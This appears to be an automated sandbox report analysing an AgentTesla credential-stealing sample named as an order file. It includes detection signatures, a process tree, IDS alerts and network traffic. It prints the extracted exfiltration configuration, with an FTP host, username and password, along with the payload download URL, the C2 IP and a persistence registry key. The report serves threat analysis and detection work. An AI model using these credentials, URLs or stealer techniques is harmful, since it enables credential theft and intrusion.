Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GEFA-Order 232343-68983689.exe

Overview

General Information

Sample name:GEFA-Order 232343-68983689.exe
Analysis ID:1529729
MD5:0c3d0b4cd6833a23ebc0687d97c64d73
SHA1:41bae7df2f2544b207777c920429383a88745035
SHA256:f0fa4e57be6d0ad0debbbb9189344a61896d0d38c6c9f2345d2421070e20389c
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GEFA-Order 232343-68983689.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Cbgoomiexw.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 7888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Cbgoomiexw.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe" MD5: 0C3D0B4CD6833A23EBC0687D97C64D73)
    • InstallUtil.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 42 entries
              SourceRuleDescriptionAuthorStrings
              0.2.GEFA-Order 232343-68983689.exe.6e10000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3047c:$s2: GetPrivateProfileString
                    • 0x2fb9d:$s3: get_OSFullName
                    • 0x3118e:$s5: remove_Key
                    • 0x3136c:$s5: remove_Key
                    • 0x3227a:$s6: FtpWebRequest
                    • 0x33043:$s7: logins
                    • 0x335b5:$s7: logins
                    • 0x362ba:$s7: logins
                    • 0x36378:$s7: logins
                    • 0x37c7e:$s7: logins
                    • 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 8 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, ProcessId: 7444, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cbgoomiexw
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T10:51:06.765174+020020299271A Network Trojan was detected192.168.2.4497315.2.84.23621TCP
                    2024-10-09T10:51:22.680290+020020299271A Network Trojan was detected192.168.2.4497405.2.84.23621TCP
                    2024-10-09T10:51:31.312442+020020299271A Network Trojan was detected192.168.2.4497435.2.84.23621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T10:51:07.397881+020028555421A Network Trojan was detected192.168.2.4497325.2.84.23654172TCP
                    2024-10-09T10:51:07.404047+020028555421A Network Trojan was detected192.168.2.4497325.2.84.23654172TCP
                    2024-10-09T10:51:23.289578+020028555421A Network Trojan was detected192.168.2.4497415.2.84.23659878TCP
                    2024-10-09T10:51:23.295500+020028555421A Network Trojan was detected192.168.2.4497415.2.84.23659878TCP
                    2024-10-09T10:51:31.937083+020028555421A Network Trojan was detected192.168.2.4497445.2.84.23650958TCP
                    2024-10-09T10:51:31.942584+020028555421A Network Trojan was detected192.168.2.4497445.2.84.23650958TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: GEFA-Order 232343-68983689.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeAvira: detection malicious, Label: HEUR/AGEN.1308518
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeReversingLabs: Detection: 15%
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeVirustotal: Detection: 26%Perma Link
                    Source: GEFA-Order 232343-68983689.exeReversingLabs: Detection: 15%
                    Source: GEFA-Order 232343-68983689.exeVirustotal: Detection: 26%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeJoe Sandbox ML: detected
                    Source: GEFA-Order 232343-68983689.exeJoe Sandbox ML: detected
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06D78E01h0_2_06D78DA0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06D78E01h0_2_06D78D91
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06EE614Eh0_2_06EE5F60
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06EE614Eh0_2_06EE5F51
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06198E01h3_2_06198DA0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06198E01h3_2_06198D91
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 0630614Eh3_2_06305F60
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 0630614Eh3_2_06305F52
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06AE8E01h7_2_06AE8DA0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06AE8E01h7_2_06AE8D93
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06C5614Eh7_2_06C55F53
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 4x nop then jmp 06C5614Eh7_2_06C55F60

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49732 -> 5.2.84.236:54172
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49731 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49741 -> 5.2.84.236:59878
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49740 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 5.2.84.236:50958
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49743 -> 5.2.84.236:21
                    Source: global trafficTCP traffic: 5.2.84.236 ports 50958,54172,59878,1,2,21
                    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 5.2.84.236:54172
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                    Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.4:49731 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /omani/Mrlres.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: rubberpartsmanufacturers.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000001.00000002.1884023773.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com
                    Source: GEFA-Order 232343-68983689.exe, Cbgoomiexw.exe.0.drString found in binary or memory: https://rubberpartsmanufacturers.com/omani/Mrlres.mp3
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.4:49742 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                    System Summary

                    barindex
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: GEFA-Order 232343-68983689.exe
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE2430 NtProtectVirtualMemory,0_2_06EE2430
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE3520 NtResumeThread,0_2_06EE3520
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE2428 NtProtectVirtualMemory,0_2_06EE2428
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE3518 NtResumeThread,0_2_06EE3518
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06302430 NtProtectVirtualMemory,3_2_06302430
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06303520 NtResumeThread,3_2_06303520
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06302428 NtProtectVirtualMemory,3_2_06302428
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06303518 NtResumeThread,3_2_06303518
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C52430 NtProtectVirtualMemory,7_2_06C52430
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C53520 NtResumeThread,7_2_06C53520
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C52428 NtProtectVirtualMemory,7_2_06C52428
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C53518 NtResumeThread,7_2_06C53518
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0192CE7C0_2_0192CE7C
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7F3700_2_06D7F370
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D79D980_2_06D79D98
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7A9800_2_06D7A980
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7F3600_2_06D7F360
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D751D80_2_06D751D8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7A9710_2_06D7A971
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9C7880_2_06D9C788
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9D4D00_2_06D9D4D0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9142C0_2_06D9142C
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D900400_2_06D90040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9C8340_2_06D9C834
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9B7B00_2_06D9B7B0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9B7A10_2_06D9B7A1
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9C77B0_2_06D9C77B
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D942900_2_06D94290
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9427F0_2_06D9427F
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D930C00_2_06D930C0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D930B00_2_06D930B0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9600D0_2_06D9600D
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D900070_2_06D90007
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D960300_2_06D96030
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9CA330_2_06D9CA33
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE5F600_2_06EE5F60
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE5F510_2_06EE5F51
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F184200_2_06F18420
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1C0500_2_06F1C050
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F18E700_2_06F18E70
